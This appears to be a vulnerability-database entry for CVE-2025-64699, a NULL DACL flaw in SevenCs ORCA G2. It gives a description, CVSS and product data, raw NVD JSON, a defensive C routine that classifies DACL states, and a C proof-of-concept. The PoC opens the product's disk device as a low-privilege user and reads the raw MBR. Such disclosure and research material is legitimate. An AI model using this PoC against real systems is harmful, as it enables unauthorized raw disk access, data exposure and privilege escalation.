Security Vulnerability Report
CVE-2025-64699 CVSS 7.8 HIGH

CVE-2025-64699

Published: 2025-12-31 16:15:48
Last Modified: 2026-01-14 20:33:12

Description

An incorrect NULL DACL issue exists in SevenCs ORCA G2 2.0.1.35 (EC2007 Kernel v5.22). The regService process, which runs with SYSTEM privileges, applies a Security Descriptor to a device object with no explicitly configured DACL. This condition could allow an attacker to perform unauthorized raw disk operations, which could lead to system disruption (DoS) and exposure of sensitive data, and may facilitate local privilege escalation.
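For defenders auditing a descriptor like the one described above, the DACL states are easy to confuse. The following is an added example, not code from this record or from the vendor: it classifies a self-relative security descriptor by its DACL state, and the function names and sample byte arrays are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define SE_DACL_PRESENT  0x0004u  /* Control bit: the DACL field is meaningful */
#define SE_SELF_RELATIVE 0x8000u  /* Control bit: fields are offsets, not pointers */

typedef enum { SD_MALFORMED, DACL_ABSENT, DACL_NULL, DACL_EMPTY, DACL_HAS_ACES } dacl_state;

static uint32_t le32(const uint8_t *p) {
    return p[0] | (p[1] << 8) | (p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Header: Revision(1) Sbz1(1) Control(2) OffsetOwner(4) OffsetGroup(4) OffsetSacl(4) OffsetDacl(4) */
dacl_state classify_dacl(const uint8_t *sd, size_t len) {
    if (len < 20 || sd[0] != 1) return SD_MALFORMED;
    uint16_t control = (uint16_t)(sd[2] | (sd[3] << 8));
    if (!(control & SE_SELF_RELATIVE)) return SD_MALFORMED;
    if (!(control & SE_DACL_PRESENT)) return DACL_ABSENT;
    uint32_t off = le32(sd + 16);
    if (off == 0) return DACL_NULL;                       /* flag set, but no ACL behind it */
    if (off < 20 || off > len - 8) return SD_MALFORMED;   /* ACL header is 8 bytes */
    uint16_t ace_count = (uint16_t)(sd[off + 4] | (sd[off + 5] << 8));
    return ace_count == 0 ? DACL_EMPTY : DACL_HAS_ACES;  /* an empty DACL denies everyone */
}

/* An absent or NULL DACL on an assigned descriptor allows full access to everyone. */
int allows_everyone(dacl_state s) { return s == DACL_ABSENT || s == DACL_NULL; }

/* Constructed sample descriptors (no owner, group or SACL). */
static const uint8_t SD_NULL_DACL[20]   = { 1, 0, 0x04, 0x80 };
static const uint8_t SD_ABSENT_DACL[20] = { 1, 0, 0x00, 0x80 };
static const uint8_t SD_EMPTY_DACL[28]  = { 1, 0, 0x04, 0x80, 0,0,0,0, 0,0,0,0, 0,0,0,0, 20,0,0,0,
                                            2, 0, 8, 0, 0, 0, 0, 0 };
/* One ACCESS_ALLOWED_ACE granting 0x001F01FF to S-1-5-32-544 (local Administrators group). */
static const uint8_t SD_ADMIN_ONLY[52]  = { 1, 0, 0x04, 0x80, 0,0,0,0, 0,0,0,0, 0,0,0,0, 20,0,0,0,
                                            2, 0, 32, 0, 1, 0, 0, 0,
                                            0, 0, 24, 0, 0xFF, 0x01, 0x1F, 0x00,
                                            1, 2, 0,0,0,0,0,5, 32,0,0,0, 0x20,0x02,0,0 };

int main(void) {
    printf("null:   open to everyone = %d\n", allows_everyone(classify_dacl(SD_NULL_DACL, sizeof SD_NULL_DACL)));
    printf("absent: open to everyone = %d\n", allows_everyone(classify_dacl(SD_ABSENT_DACL, sizeof SD_ABSENT_DACL)));
    printf("empty:  open to everyone = %d\n", allows_everyone(classify_dacl(SD_EMPTY_DACL, sizeof SD_EMPTY_DACL)));
    printf("admin:  open to everyone = %d\n", allows_everyone(classify_dacl(SD_ADMIN_ONLY, sizeof SD_ADMIN_ONLY)));
    return 0;
}
```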

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:sevencs:ec2007_kernel:5.22:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sevencs:orca_g2:2.0.1.35:*:*:*:*:*:*:* - VULNERABLE
SevenCs ORCA G2 2.0.1.35 (EC2007 Kernel v5.22)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// CVE-2025-64699 PoC - SevenCs ORCA G2 NULL DACL Local Privilege Escalation
// This PoC demonstrates exploitation of incorrect NULL DACL in regService
// Author: Security Researcher
// Note: This is for educational and authorized testing purposes only

#include <windows.h>
#include <aclapi.h>
#include <stdio.h>

#pragma comment(lib, "advapi32.lib")

int main() {
    printf("[*] CVE-2025-64699 PoC - SevenCs ORCA G2 NULL DACL Exploitation\n");
    printf("[*] Target: SevenCs ORCA G2 2.0.1.35 (EC2007 Kernel v5.22)\n\n");

    // Step 1: Attempt to open device object with NULL DACL
    HANDLE hDevice = CreateFile(
        "\\\\.\\EC2007DiskDevice",  // Target device name
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE) {
        DWORD error = GetLastError();
        printf("[-] Failed to open device object. Error code: %lu\n", error);
        printf("[-] Device may not exist or DACL is properly configured.\n");
        return 1;
    }

    printf("[+] Successfully opened device object!\n");
    printf("[+] This indicates NULL DACL vulnerability is present.\n");

    // Step 2: Perform raw disk read to demonstrate unauthorized access
    BYTE sectorBuffer[512];
    DWORD bytesRead = 0;

    // Read MBR (sector 0)
    SetFilePointer(hDevice, 0, NULL, FILE_BEGIN);
    BOOL readResult = ReadFile(hDevice, sectorBuffer, 512, &bytesRead, NULL);

    if (readResult && bytesRead == 512) {
        printf("[+] Successfully read raw disk sector (MBR)!\n");
        printf("[+] Attacker can now read/write raw disk bypassing file system ACLs.\n");

        // Display first 64 bytes of MBR as hex
        printf("\n[>] First 64 bytes of MBR:\n");
        for (int i = 0; i < 64; i++) {
            printf("%02X ", sectorBuffer[i]);
            if ((i + 1) % 16 == 0) printf("\n");
        }
        printf("\n");

        printf("[!] Impact: Unauthorized raw disk access confirmed.\n");
        printf("[!] This can lead to:\n");
        printf("    - Sensitive data exfiltration\n");
        printf("    - System disruption (DoS)\n");
        printf("    - Local privilege escalation\n");
    } else {
        printf("[-] Raw disk read failed.\n");
    }

    CloseHandle(hDevice);

    // Step 3: Check if running as low-privilege user
    HANDLE hToken;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
        TOKEN_ELEVATION Elevation;
        DWORD ReturnLength;
        if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &ReturnLength)) {
            if (!Elevation.TokenIsElevated) {
                printf("\n[+] Confirmed: Running as non-elevated (low-privilege) user.\n");
                printf("[+] Successfully exploited vulnerability from low-privilege context!\n");
            }
        }
        CloseHandle(hToken);
    }

    printf("\n[*] PoC execution completed.\n");
    return 0;
}
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64699", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:48.110", "lastModified": "2026-01-14T20:33:11.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An incorrect NULL DACL issue exists in SevenCs ORCA G2 2.0.1.35 (EC2007 Kernel v5.22). The regService process, which runs with SYSTEM privileges, applies a Security Descriptor to a device object with no explicitly configured DACL. This condition could allow an attacker to perform unauthorized raw disk operations, which could lead to system disruption (DoS) and exposure of sensitive data, and may facilitate local privilege escalation."}, {"lang": "es", "value": "Existe un problema de DACL NULA incorrecta en SevenCs ORCA G2 2.0.1.35 (EC2007 Kernel v5.22). El proceso regService, que se ejecuta con privilegios de SYSTEM, aplica un Descriptor de Seguridad a un objeto de dispositivo sin una DACL configurada explícitamente. Esta condición podría permitir a un atacante realizar operaciones de disco sin procesar no autorizadas, lo que podría provocar la interrupción del sistema (DoS) y la exposición de datos sensibles, y podría facilitar la escalada de privilegios local."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:sevencs:ec2007_kernel:5.22:*:*:*:*:*:*:*", "matchCriteriaId": "1B7535E9-C8EB-41F7-A6A8-4698A33E4239"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sevencs:orca_g2:2.0.1.35:*:*:*:*:*:*:*", "matchCriteriaId": "29199970-680B-493F-BB24-F18DE15C1468"}]}]}], "references": [{"url": "https://gist.github.com/GunP4ng/42b19ee99e94c315173b74a9fb26c2b9", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}